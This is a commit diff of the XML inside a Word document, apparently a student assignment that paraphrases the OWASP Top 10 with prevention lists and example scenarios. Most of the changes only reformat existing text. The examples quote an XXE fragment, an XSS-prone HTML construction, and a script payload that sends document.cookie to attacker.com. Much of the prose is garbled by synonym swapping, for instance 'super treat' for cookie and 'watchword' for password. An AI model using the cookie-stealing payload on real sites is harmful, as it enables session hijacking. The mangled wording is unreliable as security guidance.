<commit_message>
Added contens in JSON files
</commit_message>
<xml_diff>
--- a/Assignment and OWASP/Web Application Security - Paraphrased.docx
+++ b/Assignment and OWASP/Web Application Security - Paraphrased.docx
@@ -318,14 +318,16 @@
       </w:r>
     </w:p>
     <w:p/>
-    <w:p>
-      <w:r>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Examples</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+    <w:p/>
+    <w:p>
+      <w:r>
         <w:t>Sit</w:t>
       </w:r>
       <w:r>
@@ -443,6 +445,7 @@
         <w:t>Examples</w:t>
       </w:r>
     </w:p>
+    <w:p/>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">Situation #1: Attempting </w:t>
@@ -466,7 +469,15 @@
         <w:t>in</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> the server: ]&gt; &amp;xxe;</w:t>
+        <w:t xml:space="preserve"> the server</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>: ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>&gt; &amp;xxe;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -551,7 +562,15 @@
         <w:contextualSpacing/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Disable web server registry posting and guarantee document metadata (e.g. .git) and reinforcement records are absent inside web roots. </w:t>
+        <w:t>Disable web server registry posting and guarantee document metadata (e.g. .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>git</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">) and reinforcement records are absent inside web roots. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -572,6 +591,7 @@
         <w:t>Examples</w:t>
       </w:r>
     </w:p>
+    <w:p/>
     <w:p>
       <w:r>
         <w:t>Situation</w:t>
@@ -607,7 +627,31 @@
         <w:t xml:space="preserve">the information in the </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">account: pstmt.setString(1, request.getParameter("acct")); ResultSet results = pstmt.executeQuery( ); </w:t>
+        <w:t xml:space="preserve">account: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>pstmt.setString (</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">1, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>request.getParameter (</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">"acct")); </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ResultSet</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> results = </w:t>
+      </w:r>
+      <w:r>
+        <w:t>pstmt.executeQuery (</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> ); </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -628,7 +672,7 @@
         <w:t xml:space="preserve"> browsers to target URLs. </w:t>
       </w:r>
       <w:r>
-        <w:t>Administrators</w:t>
+        <w:t>Administrators’</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -649,7 +693,15 @@
         <w:t>administrators</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> page. http://example.com/app/getappInfo http://example.com/app/admin_getappInfo If an unauthenticated user can access either page, it’s a flaw. If a non-admin can access the admin page, this is a flaw.</w:t>
+        <w:t xml:space="preserve"> page. http://example.com/app/getappInfo http://example.com/app/admin_getappInfo </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>If</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> an unauthenticated user can access either page, it’s a flaw. If a non-admin can access the admin page, this is a flaw.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -792,9 +844,16 @@
         <w:t>Examples</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Situation 1: The application utilizes untrusted information in the development of the accompanying HTML bit without approval or getting away: (String) page += "&lt;input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'&gt;"; </w:t>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Situation 1: The application utilizes untrusted information in the development of the accompanying HTML bit without approval or getting away: (String) page += "&lt;input name='creditcard' type='TEXT' value='" + </w:t>
+      </w:r>
+      <w:r>
+        <w:t>request.getParameter (</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">"CC") + "'&gt;"; </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -805,7 +864,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">'http://www.attacker.com/cgi-receptacle/cookie.cgi? foo='+document.cookie&lt;/script&gt;'. </w:t>
+        <w:t>'http</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: /</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">/www.attacker.com/cgi-receptacle/cookie.cgi? foo='+document.cookie&lt;/script&gt;'. </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -931,6 +996,7 @@
         <w:t>Examples</w:t>
       </w:r>
     </w:p>
+    <w:p/>
     <w:p>
       <w:r>
         <w:t>Situation #1:  Calls of a r</w:t>
@@ -948,7 +1014,13 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Situation #2: A PHP discussion utilizes PHP protest serialization to spare a "super" treat, containing the's client ID, part, watchword hash, and other state: </w:t>
+        <w:t>Situation #2: A PHP discussion utilizes PHP protest serialization to spare a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> "super" treat, containing the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> client ID, part, watchword hash, and other state: </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1022,7 +1094,15 @@
         <w:contextualSpacing/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Continuously stock the renditions of both customer side and server-side segments (e.g. systems, libraries) and their conditions utilizing devices like renditions, DependencyCheck, retire.js, and so forth. </w:t>
+        <w:t xml:space="preserve">Continuously stock the renditions of both customer side and server-side segments (e.g. systems, libraries) and their conditions utilizing devices like renditions, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DependencyCheck</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, retire.js, and so forth. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1081,9 +1161,24 @@
     </w:p>
     <w:p/>
     <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2082"/>
+        </w:tabs>
+      </w:pPr>
       <w:r>
         <w:t>Examples</w:t>
       </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2082"/>
+        </w:tabs>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:r>
@@ -1104,91 +1199,93 @@
           <w:numId w:val="10"/>
         </w:numPr>
       </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Inadequate logging and </w:t>
+      </w:r>
+      <w:r>
+        <w:t>checking</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> combined with absent or insufficient coordination with episode reaction, enables assailants to additionally assault frameworks, look after determination, turn to more frameworks, and alter, extricate, or crush information. </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Preventions</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:contextualSpacing/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ensure all login, get to control disappointments, and server-side info approval disappointments can be logged with adequate client setting to distinguish suspicious or pernicious records, and held for adequate time to permit deferred legal investigation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:contextualSpacing/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Ensure that logs are produced in an organization that can be effectively devoured by an incorporated log administration arrangements. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:contextualSpacing/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Ensure high-esteem exchanges have a review trail with trustworthiness controls to counteract altering or cancellation, for example, add as it were database tables or comparable. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:contextualSpacing/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Establish viable checking and cautioning to such an extent that suspicious exercises are distinguished and reacted to in a convenient manner. </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Examples</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Situation #1: An open source venture gathering programming keep running by a little group was hacked utilizing a blemish in its product. The assailants figured out how to wipe out the interior source code archive containing the following adaptation, and the greater part of the discussion substance</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Situation #2: An aggressor utilizes filters for clients utilizing a typical watchword. They can assume control over all records utilizing this secret key. For every other client, this output leaves just a single false login behind. After some days, this might be rehashed with an alternate secret word. </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:t xml:space="preserve">Inadequate logging and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>checking</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> combined with absent or insufficient coordination with episode reaction, enables assailants to additionally assault frameworks, look after determination, turn to more frameworks, and alter, extricate, or crush information. </w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Preventions</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:contextualSpacing/>
-      </w:pPr>
-      <w:r>
-        <w:t>Ensure all login, get to control disappointments, and server-side info approval disappointments can be logged with adequate client setting to distinguish suspicious or pernicious records, and held for adequate time to permit deferred legal investigation.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:contextualSpacing/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Ensure that logs are produced in an organization that can be effectively devoured by an incorporated log administration arrangements. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:contextualSpacing/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Ensure high-esteem exchanges have a review trail with trustworthiness controls to counteract altering or cancellation, for example, add as it were database tables or comparable. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:contextualSpacing/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Establish viable checking and cautioning to such an extent that suspicious exercises are distinguished and reacted to in a convenient manner. </w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Examples</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Situation #1: An open source venture gathering programming keep running by a little group was hacked utilizing a blemish in its product. The assailants figured out how to wipe out the interior source code archive containing the following adaptation, and the greater part of the discussion substance</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Situation #2: An aggressor utilizes filters for clients utilizing a typical watchword. They can assume control over all records utilizing this secret key. For every other client, this output leaves just a single false login behind. After some days, this might be rehashed with an alternate secret word. </w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="0" w:footer="720" w:gutter="0"/>

</xml_diff>